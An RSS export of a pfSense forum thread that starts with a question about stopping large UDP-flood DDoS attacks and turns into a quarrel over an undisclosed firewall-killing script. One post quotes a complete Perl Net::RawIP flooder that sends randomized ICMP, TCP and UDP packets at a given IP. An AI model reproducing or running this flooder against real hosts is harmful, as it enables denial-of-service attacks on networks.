<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[What is the biggest attack in GBPS you stopped]]></title><description><![CDATA[<p dir="auto">hi,</p>
<p dir="auto">i am hit by ddos (upd flood mostly) and looking for solutions, hopefully opensource ones. I wanted to know what was the biggest multi gigabits attack you successfully stopped with your pfsense setup in the field ( so not with nullrouting at ISP level) and what the hardware used was.</p>
<p dir="auto">My actuel issue is on the 5 to 10 gbps DDOS udp flood attacks so i search to see if a 20gbps filtering firewall could work in the real world of April 2015 and help me mitigate 1-16gbps attacks. My problem is to filter myself not ask upstrream to help so i really speak of how i can filter this and if anyone here had setup playing at this level of gbps.</p>
<p dir="auto">regards,<br />
Ghislain.</p>
]]></description><link>https://forum.netgate.com/topic/82345/what-is-the-biggest-attack-in-gbps-you-stopped</link><generator>RSS for Node</generator><lastBuildDate>Mon, 07 Sep 2026 00:06:29 GMT</lastBuildDate><atom:link href="https://forum.netgate.com/topic/82345.rss" rel="self" type="application/rss+xml"/><pubDate>Sun, 05 Apr 2015 08:09:30 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 16:25:26 GMT]]></title><description><![CDATA[<p dir="auto">This topic is now locked.</p>
]]></description><link>https://forum.netgate.com/post/560483</link><guid isPermaLink="true">https://forum.netgate.com/post/560483</guid><dc:creator><![CDATA[jwt]]></dc:creator><pubDate>Tue, 28 Jul 2015 16:25:26 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 16:12:23 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">Franco was the only one willing to help get it upstream and the connection was made when I asked him politely.</p>
<p dir="auto">Nothing more in it.</p>
</blockquote>
<p dir="auto">Brian, I won't tollerate hostility or lies.  You stated at least two things that aren't true in this post.</p>
<p dir="auto">You should retract what you've said that isn't true.</p>
]]></description><link>https://forum.netgate.com/post/560477</link><guid isPermaLink="true">https://forum.netgate.com/post/560477</guid><dc:creator><![CDATA[jwt]]></dc:creator><pubDate>Tue, 28 Jul 2015 16:12:23 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 16:11:28 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">#!/usr/bin/perl -w</p>
<h1><a class="anchor-offset"></a>=================================================</h1>
<h1><a class="anchor-offset" name="simple-network-flooder-script"></a>simple network flooder script</h1>
<h1><a class="anchor-offset" name="takes-type-of-flood-icmp-tcp-udp-as-param"></a>takes type of flood (icmp, tcp, udp) as param</h1>
<h1><a class="anchor-offset" name="optionally-takes-dest-ip-and-packet-count"></a>optionally takes dest ip and packet count</h1>
<h1><a class="anchor-offset"></a>=================================================</h1>
<p dir="auto">my $VERSION = 0.5;</p>
<h1><a class="anchor-offset"></a>=================================================</h1>
<p dir="auto">use strict;<br />
use Net::RawIP;</p>
<p dir="auto">my $flood = shift or &amp;usage();<br />
my $dstip = shift || '127.0.0.1';<br />
my $pktct = shift || 100;</p>
<p dir="auto">&amp;icmpflood($dstip, $pktct) if $flood =~ 'icmp';<br />
&amp;tcpflood($dstip, $pktct) if $flood =~ 'tcp';<br />
&amp;udpflood($dstip, $pktct) if $flood =~ 'udp';</p>
<p dir="auto">sub icmpflood() {<br />
  my($dstip, $pktct, $code, $type, $frag);<br />
  $dstip = shift;<br />
  $pktct = shift;</p>
<p dir="auto">print "\nstarting flood to $dstip\n";<br />
  for(my $i=0; $i &lt;= $pktct; $i++) {</p>
<p dir="auto">$code = int(rand(255));<br />
      $type = int(rand(255));<br />
      $frag = int(rand(2));</p>
<p dir="auto">my $packet = new Net::RawIP({<br />
        ip =&gt; {<br />
            daddr =&gt; $dstip,<br />
            frag_off =&gt; $frag,<br />
        },<br />
        icmp =&gt; {<br />
            code =&gt; $code,<br />
            type =&gt; $type,<br />
        }<br />
      });</p>
<p dir="auto">$packet-&gt;send;<br />
      print "sent icmp $type-&gt;$code, frag: $frag\n";<br />
  }<br />
  print "\nflood complete\n\n";<br />
}</p>
<p dir="auto">sub tcpflood() {<br />
  my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,<br />
$syn, $ack);<br />
  $dstip = shift;<br />
  $pktct = shift;<br />
  print "\nstarting flood to $dstip\n";<br />
  for(my $i=0; $i &lt;= $pktct; $i++) {</p>
<p dir="auto">$sport = int(rand(65535));<br />
      $dport = int(rand(65535));<br />
      $frag = int(rand(2));<br />
      $urg = int(rand(2));<br />
      $psh = int(rand(2));<br />
      $rst = int(rand(2));<br />
      $fin = int(rand(2));<br />
      $syn = int(rand(2));<br />
      $ack = int(rand(2));</p>
<p dir="auto">my $packet = new Net::RawIP({<br />
        ip =&gt; {<br />
            daddr =&gt; $dstip,<br />
            frag_off =&gt; $frag,<br />
        },<br />
        tcp =&gt; {<br />
            source =&gt; $sport,<br />
            dest =&gt; $dport,<br />
            urg =&gt; $urg,<br />
            psh =&gt; $psh,<br />
            rst =&gt; $rst,<br />
            fin =&gt; $fin,<br />
            syn =&gt; $syn,<br />
            ack =&gt; $ack,<br />
        }<br />
      });</p>
<p dir="auto">$packet-&gt;send;<br />
      print "sent tcp packet from $sport to $dport, frag: $frag, psh:<br />
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";<br />
  }<br />
  print "\nflood complete\n\n";<br />
}</p>
<p dir="auto">sub udpflood() {<br />
  my($dstip, $pktct, $sport, $dport, $frag);<br />
  $dstip = shift;<br />
  $pktct = shift;</p>
<p dir="auto">print "\nstarting flood to $dstip\n";<br />
  for(my $i=0; $i &lt;= $pktct; $i++) {</p>
<p dir="auto">$sport = int(rand(255));<br />
      $dport = int(rand(255));<br />
      $frag = int(rand(2));</p>
<p dir="auto">my $packet = new Net::RawIP({<br />
        ip =&gt; {<br />
            daddr =&gt; $dstip,<br />
            frag_off =&gt; $frag,<br />
        },<br />
        udp =&gt; {<br />
            source =&gt; $sport,<br />
            dest =&gt; $dport,<br />
        }<br />
      });</p>
<p dir="auto">$packet-&gt;send;<br />
      print "sent udp packet from $sport to $dport, frag: $frag\n";<br />
  }<br />
  print "\nflood complete\n\n";<br />
}</p>
<p dir="auto">sub usage() {<br />
  print "<br />
need to set a valid flood type (one of icmp, tcp, udp)<br />
optionally set dest ip and packetcount</p>
<p dir="auto">example:</p>
<p dir="auto">$0 [tcp udp icmp]  \n\n";<br />
  exit 0;<br />
}</p>
</blockquote>
<p dir="auto">A shared script. Page 21 in this thread as I've called SM out earlier on for not sharing the script, but saying that I didnt get taken down directly by the attacks but when I started to use some things in the gui namely RRD graph thats when the fw went unresponsive, my experiences are around pages June 2 (Pages 31-35 iirc).</p>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/firewalluser">@<bdi>firewalluser</bdi></a>:</p>
<blockquote>
<p dir="auto">You can stop it now for that ip address as I'm on another one.</p>
<p dir="auto">I dont think it was pingable we could for the next test make it pingable but the problem with ADSL is its faster down than up so you may not get consistent pings back anyway.</p>
<p dir="auto">When you say NAT'able what do you mean by that?</p>
<p dir="auto">I tried a variety of different settings throughout, like trying to access ip addresses that were closer to me than the ip addresses coming in to port 80, swapped the firewall optimisation around from aggressive to normal to high latency (satellite links) whilst trying to get out but no joy at getting any webpages up throughout, the odd DNS request packet got out seen as a green icon in the dynamic fw log.</p>
<p dir="auto">Interestingly it seemed to max out at 2.42Mbps yet various speed tests suggest I have a 5Mbps adsl connection. CPU was 100% through out.</p>
<p dir="auto">FW stayed responsive throughout with snort running, changing various rules made some of the dashboard interface graphs stop updating second by second to maybe updating 10seconds later but I get that anyway when updating some rules or changing things in snort.</p>
<p dir="auto">The only time I managed to kill the fw was trying to load the RRD graphs for All just a moment ago with the other fw webpages (dashboard, system activity, dynamic fw log) opened along with one or two other fw webpages open when changing rules etc, otherwise I'd have stayed on the old ip address for longer trying different things.</p>
</blockquote>
]]></description><link>https://forum.netgate.com/post/560476</link><guid isPermaLink="true">https://forum.netgate.com/post/560476</guid><dc:creator><![CDATA[firewalluser]]></dc:creator><pubDate>Tue, 28 Jul 2015 16:11:28 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 16:10:50 GMT]]></title><description><![CDATA[<p dir="auto">Ok it was only for my better understanding, why all peoples where talking to you, that you where not<br />
be at the willing to show the script and in another thread it was perhaps able to read for everyone.<br />
Thanks.</p>
<blockquote>
<p dir="auto">Yes. That was just an example of how easy it is to get a script that can be used to annoy people.</p>
</blockquote>
]]></description><link>https://forum.netgate.com/post/560475</link><guid isPermaLink="true">https://forum.netgate.com/post/560475</guid><dc:creator><![CDATA[[[global:guest]]]]></dc:creator><pubDate>Tue, 28 Jul 2015 16:10:50 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 16:05:12 GMT]]></title><description><![CDATA[<p dir="auto">Yes. That was just an example of how easy it is to get a script that can be used to annoy people.</p>
<p dir="auto">@BlueKobold:</p>
<blockquote>
<blockquote>
<p dir="auto">Not the one I was using but similar :)</p>
</blockquote>
<p dir="auto">Ahh ok then this time here in this thread we are talking about another one, right?</p>
</blockquote>
]]></description><link>https://forum.netgate.com/post/560474</link><guid isPermaLink="true">https://forum.netgate.com/post/560474</guid><dc:creator><![CDATA[Supermule]]></dc:creator><pubDate>Tue, 28 Jul 2015 16:05:12 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 16:00:58 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/firewalluser">@<bdi>firewalluser</bdi></a>:</p>
<blockquote>
<p dir="auto">Following htilonom on twitter back to the account start last year and the dislike for anonabox started me wondering, then I found this thread with htilonom posting on it.</p>
<p dir="auto">https://www.reddit.com/r/PFSENSE/comments/35dl17/pfsense_vs_opnsense_articles/</p>
<p dir="auto">Theres a definite pattern.</p>
</blockquote>
<p dir="auto">Can you elaborate? Not sure if you meant it in a good or a negative way…</p>
]]></description><link>https://forum.netgate.com/post/560473</link><guid isPermaLink="true">https://forum.netgate.com/post/560473</guid><dc:creator><![CDATA[htilonom]]></dc:creator><pubDate>Tue, 28 Jul 2015 16:00:58 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 15:48:54 GMT]]></title><description><![CDATA[<blockquote>
<p dir="auto">Not the one I was using but similar :)</p>
</blockquote>
<p dir="auto">Ahh ok then this time here in this thread we are talking about another one, right?</p>
]]></description><link>https://forum.netgate.com/post/560471</link><guid isPermaLink="true">https://forum.netgate.com/post/560471</guid><dc:creator><![CDATA[[[global:guest]]]]></dc:creator><pubDate>Tue, 28 Jul 2015 15:48:54 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 15:42:06 GMT]]></title><description><![CDATA[<p dir="auto">Not the one I was using but similar :)</p>
]]></description><link>https://forum.netgate.com/post/560466</link><guid isPermaLink="true">https://forum.netgate.com/post/560466</guid><dc:creator><![CDATA[Supermule]]></dc:creator><pubDate>Tue, 28 Jul 2015 15:42:06 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 15:32:55 GMT]]></title><description><![CDATA[<blockquote>
<p dir="auto">Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.</p>
</blockquote>
<p dir="auto">Hmmm, and what kind of script you where showing them all here in the forum in this post then? ???</p>
<p dir="auto"><a href="https://forum.pfsense.org/index.php?topic=88694.msg490685#msg490685" target="_blank" rel="noopener noreferrer nofollow ugc">DDoS pfSense dies on XSYN and OVH scripts.</a></p>
]]></description><link>https://forum.netgate.com/post/560458</link><guid isPermaLink="true">https://forum.netgate.com/post/560458</guid><dc:creator><![CDATA[[[global:guest]]]]></dc:creator><pubDate>Tue, 28 Jul 2015 15:32:55 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 15:19:31 GMT]]></title><description><![CDATA[<p dir="auto">Following htilonom on twitter back to the account start last year and the dislike for anonabox started me wondering, then I found this thread with htilonom posting on it.</p>
<p dir="auto">https://www.reddit.com/r/PFSENSE/comments/35dl17/pfsense_vs_opnsense_articles/</p>
<p dir="auto">Theres a definite pattern.</p>
]]></description><link>https://forum.netgate.com/post/560451</link><guid isPermaLink="true">https://forum.netgate.com/post/560451</guid><dc:creator><![CDATA[firewalluser]]></dc:creator><pubDate>Tue, 28 Jul 2015 15:19:31 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 14:49:54 GMT]]></title><description><![CDATA[<p dir="auto">…like staring wide-eyed into the sun</p>
]]></description><link>https://forum.netgate.com/post/560435</link><guid isPermaLink="true">https://forum.netgate.com/post/560435</guid><dc:creator><![CDATA[Nullity]]></dc:creator><pubDate>Tue, 28 Jul 2015 14:49:54 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 13:44:31 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">The funny shit is that most of the arguers of ESF has limited numbers of posts.</p>
<p dir="auto">A lot of them has had their first post here.</p>
<p dir="auto">And one even registered today to begin posting in this topic. I wonder why…..</p>
</blockquote>
<p dir="auto">Yea, I registered because you're out of control. For those who are unaware, please check out my Twitter profile where most of the time I spend talking about opnsense scams like the ones Supermule attempted here.</p>
<p dir="auto">https://twitter.com/htilonom</p>
]]></description><link>https://forum.netgate.com/post/560421</link><guid isPermaLink="true">https://forum.netgate.com/post/560421</guid><dc:creator><![CDATA[htilonom]]></dc:creator><pubDate>Tue, 28 Jul 2015 13:44:31 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 13:17:19 GMT]]></title><description><![CDATA[<p dir="auto">The funny shit is that most of the arguers of ESF has limited numbers of posts.</p>
<p dir="auto">A lot of them has had their first post here.</p>
<p dir="auto">And one even registered today to begin posting in this topic. I wonder why…..</p>
<p dir="auto"><img src="/public/_imported_attachments_/1/htilonom.PNG" alt="htilonom.PNG" class=" img-fluid img-markdown" /><br />
<img src="/public/_imported_attachments_/1/htilonom.PNG_thumb" alt="htilonom.PNG_thumb" class=" img-fluid img-markdown" /></p>
]]></description><link>https://forum.netgate.com/post/560409</link><guid isPermaLink="true">https://forum.netgate.com/post/560409</guid><dc:creator><![CDATA[Supermule]]></dc:creator><pubDate>Tue, 28 Jul 2015 13:17:19 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 13:00:31 GMT]]></title><description><![CDATA[<p dir="auto">This thread is a Textbook example… http://pastebin.com/irj4Fyd5</p>
]]></description><link>https://forum.netgate.com/post/560399</link><guid isPermaLink="true">https://forum.netgate.com/post/560399</guid><dc:creator><![CDATA[firewalluser]]></dc:creator><pubDate>Tue, 28 Jul 2015 13:00:31 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 12:16:12 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">Ashley Lorenzana actually said it well…<br />
Friedrich Nietzsche carved it in stone<br />
W. G. McAdoo  had it about right.<br />
To finish this off with Calvin Coolidge</p>
</blockquote>
<p dir="auto"><img src="http://cdn.meme.am/instances/59059884.jpg" alt="" class=" img-fluid img-markdown" /></p>
]]></description><link>https://forum.netgate.com/post/560380</link><guid isPermaLink="true">https://forum.netgate.com/post/560380</guid><dc:creator><![CDATA[doktornotor]]></dc:creator><pubDate>Tue, 28 Jul 2015 12:16:12 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 12:05:23 GMT]]></title><description><![CDATA[<p dir="auto"><img src="https://images.duckduckgo.com/iu/?u=http%3A%2F%2Ftroll.me%2Fimages%2Fskaraton%2Fmodz-y-u-no-close-this-thread.jpg&amp;f=1" alt="" class=" img-fluid img-markdown" /></p>
]]></description><link>https://forum.netgate.com/post/560376</link><guid isPermaLink="true">https://forum.netgate.com/post/560376</guid><dc:creator><![CDATA[tim.mcmanus]]></dc:creator><pubDate>Tue, 28 Jul 2015 12:05:23 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 12:00:37 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/kejianshi">@<bdi>kejianshi</bdi></a>:</p>
<blockquote>
<p dir="auto">This is the sort of reply I'd expect from someone who's political views are being censored…  Not a tech rant.</p>
</blockquote>
<p dir="auto">As is about 90% of this thread  ::)</p>
]]></description><link>https://forum.netgate.com/post/560375</link><guid isPermaLink="true">https://forum.netgate.com/post/560375</guid><dc:creator><![CDATA[bennyc]]></dc:creator><pubDate>Tue, 28 Jul 2015 12:00:37 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 11:28:13 GMT]]></title><description><![CDATA[<p dir="auto">This is the sort of reply I'd expect from someone who's political views are being censored…  Not a tech rant.</p>
]]></description><link>https://forum.netgate.com/post/560365</link><guid isPermaLink="true">https://forum.netgate.com/post/560365</guid><dc:creator><![CDATA[kejianshi]]></dc:creator><pubDate>Tue, 28 Jul 2015 11:28:13 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 10:59:33 GMT]]></title><description><![CDATA[<p dir="auto">Ashley Lorenzana actually said it well…</p>
<p dir="auto">“It's okay to disagree with the thoughts or opinions expressed by other people. That doesn't give you the right to deny any sense they might make. Nor does it give you a right to accuse someone of poorly expressing their beliefs just because you don't like what they are saying. Learn to recognize good writing when you read it, even if it means overcoming your pride and opening your mind beyond what is comfortable.”</p>
<p dir="auto">Friedrich Nietzsche carved it in stone "Convictions are more dangerous enemies of truth than lies."</p>
<p dir="auto">W. G. McAdoo  had it about right. This must be a trend among some. "It is impossible to defeat an ignorant man in an argument."</p>
<p dir="auto">To finish this off with Calvin Coolidge. "Nothing in the world can take the place of persistence. Talent will not; nothing is more common than unsuccessful men with talent. Genius will not; un-rewarded genius is almost a proverb. Education will not; the world is full of educated derelicts. Persistence and determination alone are omnipotent. "</p>
<p dir="auto">Make of it what you want.</p>
<p dir="auto">EOD.</p>
]]></description><link>https://forum.netgate.com/post/560360</link><guid isPermaLink="true">https://forum.netgate.com/post/560360</guid><dc:creator><![CDATA[Supermule]]></dc:creator><pubDate>Tue, 28 Jul 2015 10:59:33 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 10:30:38 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/doktornotor">@<bdi>doktornotor</bdi></a>:</p>
<blockquote>
<p dir="auto">And more blaaaaaah blaaaaaaaaah blaaaaaaaaaaaah….</p>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">since I have allready stated I am not allowed to share the script.</p>
</blockquote>
<p dir="auto">By whom? The criminals your rented the botnet from? Would the license be more expensive?  ::) ::) ::) ;D ;D ;D</p>
</blockquote>
<p dir="auto">But at the same time Franco from opnsense has it since they will be releasing a "fix" hahaha</p>
]]></description><link>https://forum.netgate.com/post/560353</link><guid isPermaLink="true">https://forum.netgate.com/post/560353</guid><dc:creator><![CDATA[htilonom]]></dc:creator><pubDate>Tue, 28 Jul 2015 10:30:38 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 10:28:26 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">What??</p>
<p dir="auto">:D</p>
<p dir="auto">Geesus.</p>
<p dir="auto">I let people decide whats right and whats not. We have emails dating back about 6mths asking pfsense/ESF for advise and asking them for help. Almost nothing came back.</p>
<p dir="auto">Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.</p>
<p dir="auto">Its like providing guns to the youth of America and trusting them not to use it…. just to provide information to the producers of whether the damn thing could kill people or not.</p>
<p dir="auto">You keep bickering about Opnsense.</p>
<p dir="auto">I think everyone has seen that this is not about Opnsense and me since we are not related in any way.</p>
<p dir="auto">I didnt provide a fix to Franco. He did that by himself when I posted the security advise from FreeBSD.</p>
<p dir="auto">So pls. stop since you look like a fool IMHO.</p>
<p dir="auto">Lets look at it differently:</p>
<p dir="auto">When you get attacked, you call the person responsible and ask for his code?</p>
<p dir="auto">Or do you log and see whats coming and how the box behaves?</p>
<p dir="auto">You are forced to do chose the 2nd option since you have no control over whats coming your way.</p>
<p dir="auto">So providing the code has no relevance at all. Providing the test rig and do Dtrace and DEV work is the way ahead.</p>
<p dir="auto">Come on guys....</p>
<p dir="auto">I know you can do better than that, but youre cornered and have no way out.</p>
<p dir="auto">Just admit you handled it badly and we can get on with it. Nothing more in it.</p>
</blockquote>
<p dir="auto">Looks like the more facts I point out the longer and more pointless your replies get.</p>
<p dir="auto">Let's go quickly trough the facts:</p>
<p dir="auto">1. Yes you did provide fix to Franco or opnsense, as you've pointed it out multiple times in this thread https://forum.pfsense.org/index.php?topic=91856.msg539638#msg539638<br />
2. You've been promoting opnsense on this thread from its start<br />
3. You have failed to provide any context to your phantom DDOS and ignored any request for factual proof or more information<br />
4. you have been called out multiple times by most of people here for not providing any information yet now all of the sudden opnsense has the fix because "franco is a nice guy"</p>
<p dir="auto">Oh you've also gone full nuts with claims like:</p>
<blockquote>
<p dir="auto">Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.</p>
<p dir="auto">Its like providing guns to the youth of America and trusting them not to use it…. just to provide information to the producers of whether the damn thing could kill people or not.</p>
</blockquote>
<p dir="auto">Just drop it, you've been busted. The harder you try, the more obvious it gets.</p>
<blockquote>
<p dir="auto">I know you can do better than that, but youre cornered and have no way out.</p>
</blockquote>
<p dir="auto">=https://en.wikipedia.org/wiki/Spin_%28public_relations%29</p>
]]></description><link>https://forum.netgate.com/post/560352</link><guid isPermaLink="true">https://forum.netgate.com/post/560352</guid><dc:creator><![CDATA[htilonom]]></dc:creator><pubDate>Tue, 28 Jul 2015 10:28:26 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 10:14:04 GMT]]></title><description><![CDATA[<p dir="auto">Die thread die!</p>
]]></description><link>https://forum.netgate.com/post/560349</link><guid isPermaLink="true">https://forum.netgate.com/post/560349</guid><dc:creator><![CDATA[kejianshi]]></dc:creator><pubDate>Tue, 28 Jul 2015 10:14:04 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 10:15:04 GMT]]></title><description><![CDATA[<p dir="auto">And more blaaaaaah blaaaaaaaaah blaaaaaaaaaaaah….</p>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">since I have allready stated I am not allowed to share the script.</p>
</blockquote>
<p dir="auto">By whom? The criminals your rented the botnet from? Would the license be more expensive?  ::) ::) ::) ;D ;D ;D</p>
]]></description><link>https://forum.netgate.com/post/560347</link><guid isPermaLink="true">https://forum.netgate.com/post/560347</guid><dc:creator><![CDATA[doktornotor]]></dc:creator><pubDate>Tue, 28 Jul 2015 10:15:04 GMT</pubDate></item><item><title><![CDATA[Reply to What is the biggest attack in GBPS you stopped on Tue, 28 Jul 2015 10:11:11 GMT]]></title><description><![CDATA[<p dir="auto">I have replaced firewall with nuclear weapons…</p>
<p dir="auto">So, by strangers you mean the National security team, e.g.?</p>
<blockquote>
<p dir="auto">Hey guys, your COUNTRY suxxx, I can take it down in no time.</p>
<blockquote>
<p dir="auto">Hmm, interesting claim. How do you do that?<br />
Look at this YT video. (NUCLEAR BOMB)<br />
Hmm, there is no useful information in there. We need a way to reproduce it.<br />
I have the BOMB.<br />
So give it to us so that we can investigate and fix it.<br />
No way, too dangerous.<br />
So report this to the security team and provide it to them privately.<br />
No, it's not a security issue.<br />
Stop wasting our time.<br />
BOOMMM :D</p>
</blockquote>
</blockquote>
<p dir="auto">OR:</p>
<p dir="auto">So, by strangers you mean the FreeBSD security team, e.g.?</p>
<blockquote>
<p dir="auto">Hey guys, your firewall has issues, I can take it down in no time.</p>
<blockquote>
<p dir="auto">Hmm, interesting claim. How do you do that?<br />
Look at this YT video. (almost 20 videos)<br />
Hmm, there is no useful information in there. We need a way to reproduce it.<br />
I have the script.<br />
We will set up a test rig you can attack and we will log what we need to get to the bottom of this.<br />
Great. What time suits you best??<br />
We need a few days to set ip up and get it running. Will let you know. How do we get in touch?<br />
Write me a PM here on the forum or send me an email.<br />
Thanks. Talk later.</p>
</blockquote>
</blockquote>
<p dir="auto">A roadmap has been made and tests will commence. Thats the way Franco suggested and thats the right way of doing it since I have allready stated I am not allowed to share the script.</p>
<p dir="auto">End of discussion.</p>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/doktornotor">@<bdi>doktornotor</bdi></a>:</p>
<blockquote>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.</p>
</blockquote>
<p dir="auto">So, by strangers you mean the FreeBSD security team, e.g.?</p>
<blockquote>
<p dir="auto">Hey guys, your firewall suxxx, I can take it down in no time.</p>
<blockquote>
<p dir="auto">Hmm, interesting claim. How do you do that?<br />
Look at this YT video.<br />
Hmm, there is no useful information in there. We need a way to reproduce it.<br />
I have the script.<br />
So give it to us so that we can investigate and fix it.<br />
No way, too dangerous.<br />
So report this to the security team and provide it to them privately.<br />
No, it's not a security issue.<br />
Stop wasting our time.</p>
</blockquote>
</blockquote>
<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/supermule">@<bdi>Supermule</bdi></a>:</p>
<blockquote>
<p dir="auto">Just admit you handled it badly and we can get on with it. Nothing more in it.</p>
</blockquote>
<p dir="auto">Yeah, you handled it like a total idiot.</p>
<p dir="auto">Someone lock this retarded thread already, please.</p>
</blockquote>
]]></description><link>https://forum.netgate.com/post/560346</link><guid isPermaLink="true">https://forum.netgate.com/post/560346</guid><dc:creator><![CDATA[Supermule]]></dc:creator><pubDate>Tue, 28 Jul 2015 10:11:11 GMT</pubDate></item></channel></rss>